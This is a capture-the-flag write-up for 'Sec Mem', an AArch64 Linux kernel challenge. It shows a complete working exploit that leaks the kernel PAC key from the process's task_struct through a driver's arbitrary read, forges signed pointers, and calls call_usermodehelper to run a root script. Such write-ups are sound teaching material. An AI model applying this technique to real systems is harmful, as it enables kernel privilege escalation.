MCTF 2025 - Write-up Sec Mem - Pwn
Write-up - Sec Mem
This is the write-up for Sec Mem, an AArch64 kernel pwn challenge I created for the Midnight Flag CTF 2025 quals. It involves bypassing PAC in the Linux kernel.
Description
During your quest, you come across a machine containing a mysterious device that is probably being used to store information. Try to abuse it to increase your privileges and find the secret hidden in the root directory.
Solution
We are given the source code for this challenge, a kernel image and the associated file system. Since this is a kernel challenge, we start with an unprivileged user account in the VM and need to become root to read the flag.
A vulnerable driver is present and has to be exploited; its source code is provided.
Here is the important function of the driver:
static long sec_mem_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
if (cmd == sec_mem_IOC_SET_OPERATION) {
if (copy_from_user(&data, (struct sec_mem_ioctl_data *)arg, sizeof(data))) {
return -EFAULT;
}
if (data.op_index >= 3) {
return -EINVAL;
}
void *auth_ptr = autiza(device_global_struct.ops[data.op_index]);
if (!auth_ptr) {
return -EACCES;
}
buffer_op_fn op = (buffer_op_fn)auth_ptr;
ssize_t result = op(device_global_struct.buffer, &data.buffer, data.length, data.offset);
if (result < 0) {
return result;
}
if (copy_to_user(arg, &data, sizeof(data))){
return -EFAULT;
}
return 0;
}
return -EINVAL;
}
This function handles ioctl calls made on the driver, which exposes a device file at /dev/sec_mem. If the ioctl command is sec_mem_IOC_SET_OPERATION, it first copies the user-supplied sec_mem_ioctl_data structure into the kernel:
// #define BUFFER_SIZE 1024
struct sec_mem_ioctl_data {
size_t length;
uint64_t op_index;
char buffer[BUFFER_SIZE];
int64_t offset;
};
Then it checks the value of op_index, which is the index of the function that is going to be called. It uses the autiza function to authenticate the callback pointer before calling it:
void *auth_ptr = autiza(device_global_struct.ops[data.op_index]);
The ops variable is initialised in this function (on each open call on the device):
static void sec_mem_init_ops(void) {
device_global_struct.ops[0] = buffer_copy_from_user;
device_global_struct.ops[1] = buffer_copy_to_user;
device_global_struct.ops[2] = buffer_clear;
for (int i = 0; i < 3; i++) {
device_global_struct.ops[i] = paciza(device_global_struct.ops[i]);
}
}
There are 3 callback functions, used to store, read and clear a global buffer located in the .bss of the driver (struct sec_mem_buffer), and the function pointers are signed by the paciza function.
struct sec_mem_buffer {
char buffer[BUFFER_SIZE];
buffer_op_fn ops[3];
};
Vulnerabilities
Arbitrary read
The first vulnerability is an arbitrary read primitive in the buffer_copy_to_user function:
ssize_t buffer_copy_to_user(void *buffer, const void *data, size_t len, int64_t offset) {
if (len > sizeof(struct sec_mem_buffer)) {
return -EINVAL;
}
memcpy(data, buffer + offset, len);
return len;
}
The len and offset fields are provided by the user, and the data buffer is copied back to the userland buffer after the call. There is no check on the offset field, so we can memcpy arbitrary kernel memory into our userland buffer. The offset is relative to device_global_struct.buffer, so we first need to leak that address to know which value to put in offset. To leak it, we can set offset to 1024 (the size of the global buffer) and read the ops function pointers. They point into the .text section of the driver, so we can compute the buffer address from one of them.
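As a small illustration of the offset arithmetic, here is a minimal sketch that computes the value to put in offset so that buffer + offset lands on a chosen kernel address. The helper name offset_for_target is made up for this example.

```c
#include <stdint.h>

/* Hypothetical helper: signed distance from the driver's global buffer
 * to an arbitrary target address. The driver computes buffer + offset,
 * so a negative value reaches addresses located below the buffer. */
int64_t offset_for_target(uint64_t buffer_base_addr, uint64_t target_addr)
{
    /* The unsigned subtraction wraps modulo 2^64; reinterpreting the
     * result as int64_t gives the signed offset the driver expects
     * (assumes the usual two's complement conversion of gcc/clang). */
    return (int64_t)(target_addr - buffer_base_addr);
}
```

For instance, a target located 0x1000 bytes below the buffer yields an offset of -4096, and the ops array sits at offset 1024.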
Partial overwrite, arbitrary call (But no…)
In the other function :
ssize_t buffer_copy_from_user(void *buffer, const void *data, size_t len, int64_t offset) {
if (len > sizeof(struct sec_mem_buffer)) {
return -EINVAL;
}
memcpy(buffer, data, len);
return len;
}
We can copy data from userland to the global buffer of the driver. The length must not be bigger than the sec_mem_buffer structure, and the offset field is not used. The vulnerability is the check itself: it should restrict the length to the size of the buffer, not the size of the whole structure. With this we can overwrite the ops function pointers of the driver.
The next calls we make will then call an arbitrary function of our choice.
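To make the overflow concrete, the sketch below reuses the two structure definitions from the driver and checks the layout at compile-time offsets. The two helper functions are invented for the illustration, and the return type of buffer_op_fn is simplified to long.

```c
#include <stddef.h>
#include <stdint.h>

#define BUFFER_SIZE 1024

/* Simplified callback type (the driver returns ssize_t). */
typedef long (*buffer_op_fn)(void *, const void *, size_t, int64_t);

struct sec_mem_buffer {
    char buffer[BUFFER_SIZE];
    buffer_op_fn ops[3];
};

struct sec_mem_ioctl_data {
    size_t length;
    uint64_t op_index;
    char buffer[BUFFER_SIZE];
    int64_t offset;
};

/* Number of bytes the flawed length check lets us write past the buffer. */
size_t overflow_bytes(void)
{
    return sizeof(struct sec_mem_buffer) - BUFFER_SIZE;
}

/* The copy starts at data.buffer, so the user field located BUFFER_SIZE
 * bytes further (data.offset) is what lands on ops[0]. Returns 1 if so. */
int offset_field_overlaps_ops0(void)
{
    size_t src = offsetof(struct sec_mem_ioctl_data, offset)
               - offsetof(struct sec_mem_ioctl_data, buffer);
    size_t dst = offsetof(struct sec_mem_buffer, ops);
    return src == dst;
}
```

On a 64-bit build overflow_bytes() is 24, exactly the three function pointers, and the offset field of the request is the value that replaces ops[0].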
But the challenge would be too easy without any protection.
Let’s review the autiza and paciza functions:
static void *paciza(void *ptr) {
__asm__ volatile (
"paciza %0"
: "+r" (ptr)
);
return ptr;
}
static void *autiza(void *ptr) {
__asm__ volatile (
"autiza %0"
: "+r" (ptr)
);
return ptr;
}
They apply the paciza and autiza instructions to the ops pointers. These two instructions belong to the PAC security feature. PAC stands for Pointer Authentication Code; its goal is to protect pointers and data from being modified by an attacker, using a signing step and an authentication step.
I already did a challenge which used PAC in the past : pacapable.
PAC works with three parameters :
- the pointer to sign/authenticate
- a modifier (context) (could be null)
- a key related to PAC instruction (A or B) (there are multiple for different usages)
The signature is stored in the upper bits of the address when the signing instruction is executed. The signature is removed if the authentication instruction succeeds. Here is a schema :
The modifier can be the stack pointer value, for example (with the paciasp instruction); there are multiple variants of the PAC instructions to choose the modifier and the key we want.
The signature is basically a keyed hash of the pointer and the modifier.
The driver uses paciza and autiza, which sign with a null modifier. Even if the modifier is null, we don’t know the A key used by the kernel.
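As an illustration of where the signature lives, here is a minimal sketch that separates the PAC bits from the address bits of a signed pointer. It assumes 48-bit virtual addresses without top-byte-ignore, which matches the constants used later in this write-up; the helper names are invented for the example.

```c
#include <stdint.h>

/* Assumption: 48-bit virtual addresses, no top-byte-ignore. */
#define VA_BITS  48
/* PAC bits: everything above the address bits, except bit 55. */
#define PAC_MASK (~((1ULL << 55) | ((1ULL << VA_BITS) - 1)))

/* Return only the signature bits of a signed pointer. */
uint64_t pac_bits(uint64_t signed_ptr)
{
    return signed_ptr & PAC_MASK;
}

/* Rebuild the canonical address: bit 55 is not overwritten by the
 * signature and tells kernel (1) from user (0) addresses. */
uint64_t strip_pac(uint64_t signed_ptr)
{
    if (signed_ptr & (1ULL << 55))
        return signed_ptr | PAC_MASK;   /* kernel: upper bits all ones */
    return signed_ptr & ~PAC_MASK;      /* user: upper bits all zeros */
}
```

For a kernel pointer this gives the same result as OR-ing the value with 0xffff000000000000, which is what the exploit does on the leaked function pointer.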
Could we use our arbitrary read primitive to leak the A key used by the kernel ?
PAC implementation in the Linux Kernel
To understand the implementation of PAC in the Linux kernel, we can use Elixir Bootlin, which allows us to navigate and search the kernel source code.
The interesting PAC code is in this file : https://elixir.bootlin.com/linux/v6.13.7/source/arch/arm64/include/asm/pointer_auth.h#L53
There is a structure which stores the A key in the kernel if CONFIG_ARM64_PTR_AUTH_KERNEL is defined. Here is part of the code:
#define __ptrauth_key_install_nosync(k, v) \
do { \
struct ptrauth_key __pki_v = (v); \
write_sysreg_s(__pki_v.lo, SYS_ ## k ## KEYLO_EL1); \
write_sysreg_s(__pki_v.hi, SYS_ ## k ## KEYHI_EL1); \
} while (0)
#ifdef CONFIG_ARM64_PTR_AUTH_KERNEL
struct ptrauth_keys_kernel {
struct ptrauth_key apia;
};
static __always_inline void ptrauth_keys_init_kernel(struct ptrauth_keys_kernel *keys)
{
if (system_supports_address_auth())
get_random_bytes(&keys->apia, sizeof(keys->apia));
}
static __always_inline void ptrauth_keys_switch_kernel(struct ptrauth_keys_kernel *keys)
{
if (!system_supports_address_auth())
return;
__ptrauth_key_install_nosync(APIA, keys->apia);
isb();
}
// [...]
#ifdef CONFIG_ARM64_PTR_AUTH_KERNEL
#define ptrauth_thread_init_kernel(tsk) \
ptrauth_keys_init_kernel(&(tsk)->thread.keys_kernel)
#define ptrauth_thread_switch_kernel(tsk) \
ptrauth_keys_switch_kernel(&(tsk)->thread.keys_kernel)
The kernel only uses the A key (apia in the structure above), unlike userland processes, which have several different keys. The key is initialised with get_random_bytes.
By analysing the code, we can see that the A key is initialised with ptrauth_thread_init_kernel, which is called when a new process is created: https://elixir.bootlin.com/linux/v6.13.7/source/arch/arm64/kernel/process.c#L419 .
So every process has its own kernel PAC key, stored in its kernel task, which is of type struct task_struct. The key lives in the thread struct embedded in the task_struct: https://elixir.bootlin.com/linux/v6.13.7/source/include/linux/sched.h#L1614 and https://elixir.bootlin.com/linux/v6.13.7/source/arch/arm64/include/asm/processor.h#L178.
struct thread_struct {
// [...]
#ifdef CONFIG_ARM64_PTR_AUTH
struct ptrauth_keys_user keys_user;
#ifdef CONFIG_ARM64_PTR_AUTH_KERNEL
struct ptrauth_keys_kernel keys_kernel;
The A key currently in use by the CPU is held in the APIAKEYLO_EL1 and APIAKEYHI_EL1 system registers.
Abuse read primitive to leak PAC key
What we can do now is use our read primitive to walk all the tasks in the kernel and find the one belonging to our process, which talks to the driver. Once we have found its task_struct, we can leak the kernel A key for our process context.
With this we can forge arbitrary PAC-signed pointers that carry a valid signature in that context.
First, we need to leak a pointer of the driver to learn the address of the global buffer (and therefore the right offset values, since buffer_copy_to_user reads relative to this address).
ioctl_data.op_index = 1;
ioctl_data.offset = 1024;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer;
printf("[+] Leak function copy from user [PACed] : %llx\n",
leak_cpy_from_user);
leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer | 0xffff000000000000;
printf("[+] Leak function copy from user : %llx\n", leak_cpy_from_user);
uint64_t buffer_base_addr = leak_cpy_from_user + 0x2588;
printf("[+] buffer_base_addr : %llx\n", buffer_base_addr);
Then we can write a function that reads arbitrary kernel memory, using buffer_base_addr as a base.
void arb_read(uint64_t buffer_base_addr, uint64_t target_addr, char *res_buf) {
struct sec_mem_ioctl_data ioctl_data;
ioctl_data.op_index = 1;
//printf("[+] Read @ : %llx // buffer_base_addr : %llx\n",
// target_addr,buffer_base_addr);
ioctl_data.offset = target_addr - buffer_base_addr;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
}
memcpy(res_buf, ioctl_data.buffer, 512);
ioctl_data.op_index = 2;
ioctl_data.offset = 0;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for buffer clear");
close(fd);
}
memset(ioctl_data.buffer, 0, BUFFER_SIZE);
}
We need to leak the kernel base (because of KASLR); there is a pointer relative to __start_init_stack shortly after the buffer. The ksymaddr-remote command of the incredible gef fork from bata24 is really helpful to get the symbols of the kernel.
ioctl_data.op_index = 1;
ioctl_data.offset = 1024 + 0x0050;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak = *(uint64_t *)ioctl_data.buffer; // __start_init_stack+0x994e8
printf("[+] Leak ptr kernel .text : %llx\n", leak);
uint64_t kbase = leak - 0xb894e8;
printf("[+] kbase : %llx\n", kbase);
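The rebasing arithmetic can be written as two tiny helpers. This is only a sketch: the helper and macro names are invented, and the two offsets are the ones used in this exploit, so they are specific to this kernel build.

```c
#include <stdint.h>

/* Offsets specific to this challenge's kernel build (taken from the exploit). */
#define LEAK_OFFSET      0xb894e8ULL  /* leaked pointer - kernel base */
#define INIT_TASK_OFFSET 0xb019c0ULL  /* init_task - kernel base */

/* KASLR slides the whole image, so distances inside it stay constant. */
uint64_t kbase_from_leak(uint64_t leak)
{
    return leak - LEAK_OFFSET;
}

/* Address of a symbol once the randomised base is known. */
uint64_t symbol_addr(uint64_t kbase, uint64_t offset)
{
    return kbase + offset;
}
```

With a kernel base of 0xffff800080010000, symbol_addr(kbase, INIT_TASK_OFFSET) gives 0xffff800080b119c0, which is the init_task address reported by gef in this write-up.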
Then we can walk all the tasks, starting with init_task (the first kernel task of the task linked list). The gef fork from bata24 makes it easy to get the offset of this symbol from kbase, as well as the offsets of its fields:
gef> ktask
[+] Wait for memory scan
[+] init_task: 0xffff800080b119c0
[+] offsetof(task_struct, tasks): 0x338
[+] Number of tasks: 41
[+] offsetof(task_struct, mm): 0x388
[+] offsetof(task_struct, stack): 0x20
[+] offsetof(task_struct, pid): 0x408
[+] offsetof(task_struct, stack_canary): 0x410
[+] offsetof(task_struct, comm): 0x5e8
[+] offsetof(task_struct, cred): 0x5e0
[+] offsetof(cred, uid): 0x4
We search for our process name in the comm field (in our case, user is the name of our exploit process):
uint64_t init_task = kbase + 0xb019c0;
uint64_t curr_task = init_task;
char leak_buf[512]; // arb_read copies 512 bytes into this buffer
uint64_t process_task_struct = 0;
printf("[+] search process task_struct\n");
while (1) {
arb_read(buffer_base_addr, curr_task + 0x5e8, leak_buf);
if (!memcmp(leak_buf, "user", 5)) {
printf("[+] found process task_struct @ %llx \n", curr_task);
break;
}
arb_read(buffer_base_addr, curr_task + 0x338, leak_buf);
curr_task = *(uint64_t *)leak_buf - 0x338;
// printf("[+] curr_task : %llx\n", curr_task);
}
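The pointer arithmetic in this loop (read tasks.next, then subtract the offset of tasks) is the kernel's usual container_of pattern. Here is a userland sketch of the same walk on a mock structure; mock_task and both helpers are invented for the illustration and are much smaller than the real task_struct.

```c
#include <stddef.h>
#include <string.h>

/* Simplified stand-ins for the kernel types. */
struct list_head { struct list_head *next, *prev; };

struct mock_task {
    int pid;
    struct list_head tasks;   /* links point at this member, not at the task */
    char comm[16];
};

/* Walk the circular list starting at init; return the task whose comm
 * matches name, or NULL after one full turn. */
struct mock_task *find_task_by_comm(struct mock_task *init, const char *name)
{
    struct mock_task *cur = init;
    do {
        if (strncmp(cur->comm, name, sizeof(cur->comm)) == 0)
            return cur;
        /* tasks.next is the address of the next task's list_head, so
         * subtract the member offset to get back to the task itself. */
        cur = (struct mock_task *)((char *)cur->tasks.next
                                   - offsetof(struct mock_task, tasks));
    } while (cur != init);
    return NULL;
}

/* Link n tasks stored in an array into a circular doubly linked list. */
void link_tasks(struct mock_task *t, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        t[i].tasks.next = &t[(i + 1) % n].tasks;
        t[i].tasks.prev = &t[(i + n - 1) % n].tasks;
    }
}
```

Unlike the exploit loop, this version stops once it is back at the starting task, which avoids spinning forever if the name is never found.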
Next we can leak the A PAC key (which is split into two 64-bit fields):
arb_read(buffer_base_addr, curr_task + 0xf28, leak_buf);
apiakey_pac_low = *(uint64_t *)leak_buf;
arb_read(buffer_base_addr, curr_task + 0xf30, leak_buf);
apiakey_pac_high = *(uint64_t *)leak_buf;
printf("[+] Leak PAC keys of ktask : High : %llx & Low : %llx\n",
apiakey_pac_high, apiakey_pac_low);
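Since the two halves of the key are adjacent in memory (lo at 0xf28, hi at 0xf30 here), a single leak of at least 16 bytes contains both. The sketch below decodes them from a raw leak; the struct and function names are invented for the example, and a little-endian host is assumed.

```c
#include <stdint.h>
#include <string.h>

/* Same layout as the key structure: low half first, then high half. */
struct pac_key {
    uint64_t lo, hi;
};

/* Decode a key from 16 leaked bytes. memcpy is used instead of pointer
 * casts to avoid alignment and strict-aliasing problems.
 * Assumption: the host is little-endian, like the AArch64 target. */
struct pac_key key_from_leak(const unsigned char *leak)
{
    struct pac_key k;
    memcpy(&k.lo, leak, sizeof(k.lo));
    memcpy(&k.hi, leak + sizeof(k.lo), sizeof(k.hi));
    return k;
}
```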
Now that we have the key, we need to forge pointers with it the same way QEMU's emulation does (that is, reproduce the paciza instruction).
We can reuse the QEMU source code: https://github.com/qemu/qemu/blob/b876e721f1c939f3e83ac85bd3c1c2821e12b3fa/target/arm/tcg/pauth_helper.c#L327 , with some adjustments to compile it in our program.
// in pauth_auth
bot_bit = 64 - param.tsz;
top_bit = 64 - 8 * param.tbi;
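After some testing, the values that work here are bot_bit = 48 and top_bit = 64 (as hard-coded in the header at the end), which corresponds to tsz = 16 and tbi = 0 in the formulas above; they define which bits hold the signature. The top 2 bytes of the pointer are not part of the signed address because the signature is stored in them.
See the header file at the end for the full implementation.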
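To see what these two parameters do, here is a minimal sketch that derives the PAC bit field from tsz and tbi using the two formulas quoted from QEMU. The function name is invented; the header at the end hard-codes bot_bit = 48 and top_bit = 64, which corresponds to tsz = 16 and tbi = 0 in these formulas.

```c
#include <stdint.h>

/* Bits [bot_bit, top_bit) of the pointer carry the PAC, except bit 55,
 * which is preserved to tell kernel and user addresses apart. */
uint64_t pac_field_mask(int tsz, int tbi)
{
    int bot_bit = 64 - tsz;
    int top_bit = 64 - 8 * tbi;
    int length = top_bit - bot_bit;
    uint64_t field;

    /* Guard against empty or out-of-range fields (and invalid shifts). */
    if (length <= 0 || bot_bit < 0)
        return 0;
    field = (~0ULL >> (64 - length)) << bot_bit;
    return field & ~(1ULL << 55);
}
```

With tsz = 16 and tbi = 0 the mask is 0xff7f000000000000: the top two bytes minus bit 55. Enabling top-byte-ignore (tbi = 1) would shrink it to 0x007f000000000000.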
We can then compute an arbitrary signed pointer that the driver will accept and call in our context.
To verify this, we can sign our leaked function pointer (buffer_copy_from_user) with the leaked key and check that the result matches the signed value we leaked.
key.lo = apiakey_pac_low;
key.hi = apiakey_pac_high;
ptr = leak_cpy_from_user;
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] Checking keys by signing first leaked pointer : 0x%llx\n", r);
And it works :)
We now have an arbitrary call primitive. I first tried to use the run_cmd function, which takes a command string and runs it as a userland binary, but I didn’t find it in the symbols (I don’t actually know why). So I decided to use the function it relies on, call_usermodehelper: https://elixir.bootlin.com/linux/v6.12.9/source/kernel/reboot.c#L840 , which runs a userland binary as root.
We control the arguments; the first two are pointers to memory whose contents we control.
op(device_global_struct.buffer, &data.buffer, data.length, data.offset);
From reading the kernel code of usermodehelper, argv cannot be NULL, so we have to provide a valid argv array.
ptr = kbase + 0x00045a2c; // call_usermodehelper
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] prepare to call : %llx\n",ptr);
memset(&ioctl_data,0, sizeof(ioctl_data));
ioctl_data.length = sizeof(struct sec_mem_ioctl_data);
ioctl_data.op_index = 0;
memset(ioctl_data.buffer, 0, 1024);
strcpy(ioctl_data.buffer,"/tmp/get_root");
ioctl_data.offset = r;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_from_user");
close(fd);
return 1;
}
// trigger
memset(&ioctl_data,0, sizeof(ioctl_data));
*(uint64_t*) ioctl_data.buffer = buffer_base_addr; // set argv
ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data);
We use the write command of the ioctl to overwrite the buffer_copy_from_user pointer in ops (ioctl_data.offset = r; is the value that lands on ops[0]).
The same write places the path of our userland binary (/tmp/get_root) at the start of the global buffer; it is used both as the path and as argv[0].
Finally, we trigger the call_usermodehelper call with a second ioctl whose op_index is 0, which now calls our overwritten pointer.
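The way the four arguments of op() line up with call_usermodehelper(path, argv, envp, wait) can be sketched as follows. The umh_args struct and map_op_args helper are invented for the illustration; they only reinterpret the values, nothing is executed.

```c
#include <stddef.h>
#include <stdint.h>

/* The hijacked call as seen by call_usermodehelper. */
struct umh_args {
    const char *path;   /* 1st argument: executable to run */
    char **argv;        /* 2nd argument: argument vector */
    char **envp;        /* 3rd argument: environment */
    int wait;           /* 4th argument: wait mode */
};

/* Hypothetical helper: reinterpret the values the driver passes to
 * op(buffer, &data.buffer, data.length, data.offset). */
struct umh_args map_op_args(void *buffer, const void *data,
                            size_t len, int64_t offset)
{
    struct umh_args a;
    a.path = (const char *)buffer;      /* global buffer: "/tmp/get_root" */
    a.argv = (char **)data;             /* request buffer: { path, NULL } */
    a.envp = (char **)(uintptr_t)len;   /* length 0 becomes a NULL envp */
    a.wait = (int)offset;               /* offset 0 becomes wait mode 0 */
    return a;
}
```

This is why the trigger request is zeroed except for its first 8 bytes: the request buffer becomes an argv array whose first entry points at the global buffer and whose second entry is NULL, while length and offset give a NULL envp and a wait mode of 0.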
get_root script:
#!/bin/sh
/bin/busybox touch /tmp/pwn
/bin/busybox cat /root/flag.txt > /tmp/flag
Full exploit
user.c :
#include "../solve/pauth_helper.h"
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>
#define DEVICE_NAME "/dev/sec_mem"
#define sec_mem_IOC_MAGIC 'k'
#define sec_mem_IOC_SET_OPERATION _IOW(sec_mem_IOC_MAGIC, 3, unsigned int)
#define BUFFER_SIZE 1024
int fd;
struct sec_mem_ioctl_data {
size_t length;
uint64_t op_index;
char buffer[BUFFER_SIZE];
int64_t offset;
};
void arb_read(uint64_t buffer_base_addr, uint64_t target_addr, char *res_buf) {
struct sec_mem_ioctl_data ioctl_data;
ioctl_data.op_index = 1;
//printf("[+] Read @ : %llx // buffer_base_addr : %llx\n",
// target_addr,buffer_base_addr);
ioctl_data.offset = target_addr - buffer_base_addr;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
}
memcpy(res_buf, ioctl_data.buffer, 512);
ioctl_data.op_index = 2;
ioctl_data.offset = 0;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for buffer clear");
close(fd);
}
memset(ioctl_data.buffer, 0, BUFFER_SIZE);
}
int op_index = 0;
uint64_t ptr = 0;
int64_t modifier = 0;
struct ARMPACKey key;
uint64_t r = 0;
int main() {
struct sec_mem_ioctl_data ioctl_data;
uint64_t apiakey_pac_high = 0;
uint64_t apiakey_pac_low = 0;
fd = open(DEVICE_NAME, O_RDWR);
if (fd == -1) {
perror("Failed to open device");
return 1;
}
ioctl_data.op_index = 1;
ioctl_data.offset = 1024;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer;
printf("[+] Leak function copy from user [PACed] : %llx\n",
leak_cpy_from_user);
leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer | 0xffff000000000000;
printf("[+] Leak function copy from user : %llx\n", leak_cpy_from_user);
uint64_t buffer_base_addr = leak_cpy_from_user + 0x2588;
printf("[+] buffer_base_addr : %llx\n", buffer_base_addr);
ioctl_data.op_index = 1;
ioctl_data.offset = 1024 + 0x0050;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak = *(uint64_t *)ioctl_data.buffer; // __start_init_stack+0x994e8
printf("[+] Leak ptr kernel .text : %llx\n", leak);
uint64_t kbase = leak - 0xb894e8;
printf("[+] kbase : %llx\n", kbase);
/* ktask
gef> ktask
[+] Wait for memory scan
[+] init_task: 0xffff800080b119c0
[+] offsetof(task_struct, tasks): 0x338
[+] Number of tasks: 41
[+] offsetof(task_struct, mm): 0x388
[+] offsetof(task_struct, stack): 0x20
[+] offsetof(task_struct, pid): 0x408
[+] offsetof(task_struct, stack_canary): 0x410
[+] offsetof(task_struct, comm): 0x5e8
[+] offsetof(task_struct, cred): 0x5e0
[+] offsetof(cred, uid): 0x4
*/
uint64_t init_task = kbase + 0xb019c0;
uint64_t curr_task = init_task;
char leak_buf[512]; // arb_read copies 512 bytes into this buffer
uint64_t process_task_struct = 0;
printf("[+] search process task_struct\n");
while (1) {
arb_read(buffer_base_addr, curr_task + 0x5e8, leak_buf);
if (!memcmp(leak_buf, "user", 5)) {
printf("[+] found process task_struct @ %llx \n", curr_task);
break;
}
arb_read(buffer_base_addr, curr_task + 0x338, leak_buf);
curr_task = *(uint64_t *)leak_buf - 0x338;
// printf("[+] curr_task : %llx\n", curr_task);
}
// APIAKEY : curr_task+0x0f28
arb_read(buffer_base_addr, curr_task + 0xf28, leak_buf);
apiakey_pac_low = *(uint64_t *)leak_buf;
arb_read(buffer_base_addr, curr_task + 0xf30, leak_buf);
apiakey_pac_high = *(uint64_t *)leak_buf;
printf("[+] Leak PAC keys of ktask : High : %llx & Low : %llx\n",
apiakey_pac_high, apiakey_pac_low);
key.lo = apiakey_pac_low;
key.hi = apiakey_pac_high;
ptr = leak_cpy_from_user;
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] Checking keys by signing first leaked pointer : 0x%llx\n", r);
ptr = kbase + 0x00045a2c; // call_usermodehelper
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] prepare to call : %llx\n",ptr);
memset(&ioctl_data,0, sizeof(ioctl_data));
ioctl_data.length = sizeof(struct sec_mem_ioctl_data);
ioctl_data.op_index = 0;
memset(ioctl_data.buffer, 0, 1024);
strcpy(ioctl_data.buffer,"/tmp/get_root");
ioctl_data.offset = r;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_from_user");
close(fd);
return 1;
}
// trigger
memset(&ioctl_data,0, sizeof(ioctl_data));
*(uint64_t*) ioctl_data.buffer = buffer_base_addr; // set argv
ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data);
close(fd);
exit(0);
}
pauth_helper.h
/*
* ARM v8.3-PAuth Operations
*
* Copyright (c) 2019 Linaro, Ltd.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/
/*
#include "qemu/osdep.h"
#include "cpu.h"
#include "internals.h"
#include "cpu-features.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "exec/helper-proto.h"
#include "tcg/tcg-gvec-desc.h"
#include "qemu/xxhash.h"
*/
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <assert.h>
typedef struct ARMPACKey {
uint64_t lo, hi;
} ARMPACKey;
typedef uint64_t * CPUARMState;
#define MAKE_64BIT_MASK(shift, length) \
(((~0ULL) >> (64 - (length))) << (shift))
static inline uint64_t extract64(uint64_t value, int start, int length)
{
assert(start >= 0 && length > 0 && length <= 64 - start);
return (value >> start) & (~0ULL >> (64 - length));
}
static inline uint32_t extract32(uint32_t value, int start, int length)
{
assert(start >= 0 && length > 0 && length <= 32 - start);
return (value >> start) & (~0U >> (32 - length));
}
static uint64_t pac_cell_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= extract64(i, 52, 4);
o |= extract64(i, 24, 4) << 4;
o |= extract64(i, 44, 4) << 8;
o |= extract64(i, 0, 4) << 12;
o |= extract64(i, 28, 4) << 16;
o |= extract64(i, 48, 4) << 20;
o |= extract64(i, 4, 4) << 24;
o |= extract64(i, 40, 4) << 28;
o |= extract64(i, 32, 4) << 32;
o |= extract64(i, 12, 4) << 36;
o |= extract64(i, 56, 4) << 40;
o |= extract64(i, 20, 4) << 44;
o |= extract64(i, 8, 4) << 48;
o |= extract64(i, 36, 4) << 52;
o |= extract64(i, 16, 4) << 56;
o |= extract64(i, 60, 4) << 60;
return o;
}
static uint64_t pac_cell_inv_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= extract64(i, 12, 4);
o |= extract64(i, 24, 4) << 4;
o |= extract64(i, 48, 4) << 8;
o |= extract64(i, 36, 4) << 12;
o |= extract64(i, 56, 4) << 16;
o |= extract64(i, 44, 4) << 20;
o |= extract64(i, 4, 4) << 24;
o |= extract64(i, 16, 4) << 28;
o |= i & MAKE_64BIT_MASK(32, 4);
o |= extract64(i, 52, 4) << 36;
o |= extract64(i, 28, 4) << 40;
o |= extract64(i, 8, 4) << 44;
o |= extract64(i, 20, 4) << 48;
o |= extract64(i, 0, 4) << 52;
o |= extract64(i, 40, 4) << 56;
o |= i & MAKE_64BIT_MASK(60, 4);
return o;
}
static uint64_t pac_sub(uint64_t i)
{
static const uint8_t sub[16] = {
0xb, 0x6, 0x8, 0xf, 0xc, 0x0, 0x9, 0xe,
0x3, 0x7, 0x4, 0x5, 0xd, 0x2, 0x1, 0xa,
};
uint64_t o = 0;
int b;
for (b = 0; b < 64; b += 4) {
o |= (uint64_t)sub[(i >> b) & 0xf] << b;
}
return o;
}
static uint64_t pac_sub1(uint64_t i)
{
static const uint8_t sub1[16] = {
0xa, 0xd, 0xe, 0x6, 0xf, 0x7, 0x3, 0x5,
0x9, 0x8, 0x0, 0xc, 0xb, 0x1, 0x2, 0x4,
};
